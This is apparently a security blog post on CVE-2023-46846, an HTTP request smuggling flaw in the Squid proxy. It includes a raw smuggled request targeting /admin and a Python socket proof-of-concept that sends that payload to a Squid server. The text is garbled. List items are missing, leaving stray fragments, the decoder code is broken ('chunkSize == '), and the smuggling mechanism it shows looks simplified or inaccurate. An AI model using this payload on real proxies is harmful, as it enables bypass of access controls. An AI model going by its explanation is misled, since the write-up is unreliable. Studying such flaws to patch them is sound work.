CVE-2023-46846 - How SQUID’s Chunked Decoder Lenience Enables HTTP Request Smuggling Attacks

In October 2023, security researchers uncovered CVE-2023-46846, a worrying vulnerability in the popular open-source proxy server, Squid. This bug lets attackers exploit lenient parsing of HTTP requests, specifically in the way Squid handles chunked transfer encoding. The result? Attackers can sneak malicious requests past firewalls and security frontends, perform request smuggling, and potentially compromise backend systems.

This in-depth post explains CVE-2023-46846, shows what’s going wrong inside the code, and walks you through a sample exploit scenario.

What is HTTP Request Smuggling?

Before diving into Squid, let’s clarify HTTP request smuggling. This attack abuses different interpretations of HTTP requests between frontends (like proxies or load balancers) and backends (like web servers).

The attacker crafts a sneaky request that the frontend thinks is structured one way, while the backend sees it another way. That lets the attacker:

Steal data or perform unauthorized actions

A classic vector: mixing up Content-Length and Transfer-Encoding: chunked headers, or abusing inconsistencies in chunked parsing.

The CVE-2023-46846 Vulnerability

CVE-2023-46846 is due to Squid failing to reject malformed chunked transfer requests. It accepts and forwards them, even if part of the request arrives later. Squid’s parsing is too lenient, meaning it doesn't consistently enforce the HTTP standard for chunked messages.

Root Cause

When Squid acts as a reverse or forward proxy, it parses incoming HTTP requests. If the request includes Transfer-Encoding: chunked, Squid decodes the body in chunks.

Sends on any "handed-in" extra data to the backend as a new HTTP request

This can split a single attacker-supplied HTTP message into multiple backend requests—bypassing security controls and privacy boundaries.

Attackers craft a poisoned request

POST / HTTP/1.1
Host: victim-site.com
Transfer-Encoding: chunked

5;foo=bar
Hello


GET /admin HTTP/1.1
Host: victim-site.com
X-Evil: 1

Squid parses the chunked body as "Hello" and sees end of message.

- The leftover lines (GET /admin...) are treated as a brand-new HTTP request and sent to the backend.
- The backend app processes a request the frontend never meant to allow—request smuggling achieved!

Here’s a boiled-down snippet of Squid’s chunked decoding logic (simplified for clarity)

if (chunked) {
    while (!finished) {
        line = readLine();
        chunkSize = parseHex(line);
        if (chunkSize == ) {
            finished = true;
        } else {
            body += readBytes(chunkSize);
            readLine(); // supposed CRLF after each chunk
        }
    }
}
// ... after finishing the request, Squid accidentally forwards remaining data as new HTTP request(s)

Proof-of-Concept Exploit

If you want to see this in action safely (for educational purposes), use the following Python script. Don't attack systems you don't own!

import socket

host = "target-squid-server"
port = 3128  # default Squid port

payload = (
    "POST / HTTP/1.1\r\n"
    "Host: victim.com\r\n"
    "Transfer-Encoding: chunked\r\n"
    "\r\n"
    "5\r\n"
    "Hello\r\n"
    "\r\n"
    "\r\n"
    "GET /admin HTTP/1.1\r\n"
    "Host: victim.com\r\n"
    "X-Header: evil\r\n"
    "\r\n"
)

with socket.create_connection((host, port)) as s:
    s.sendall(payload.encode())
    # You may need to read response(s)
    print(s.recv(4096).decode(errors="ignore"))

This will cause Squid to forward the GET /admin request as if it’s a new, separate request.

The Squid team patched this in November 2023.

Check their advisory page and update to a fixed release.

Test your Setup:

Use scanners like Coraza HTTPSmuggler or Burp Suite’s request smuggling tool.

References and Further Reading

- Squid Security Advisory: SQUID-2023:7
- Common Weakness Enumeration: CWE-444 (HTTP Request Smuggling)
- PortSwigger’s HTTP Request Smuggling Research
- NIST NVD: CVE-2023-46846
- Squid Official Releases

Conclusion

CVE-2023-46846 is a reminder that small parsing bugs can have big consequences. If you run Squid anywhere in your stack, patch now—and review your network’s defenses against HTTP request smuggling. Attackers love proxy servers with unpatched quirks. Don’t let yours be the next one compromised.

If you found this article useful, share it, patch your proxies, and keep learning about web security!

Timeline

Published on: 11/03/2023 08:15:07 UTC
Last modified on: 11/14/2023 21:15:11 UTC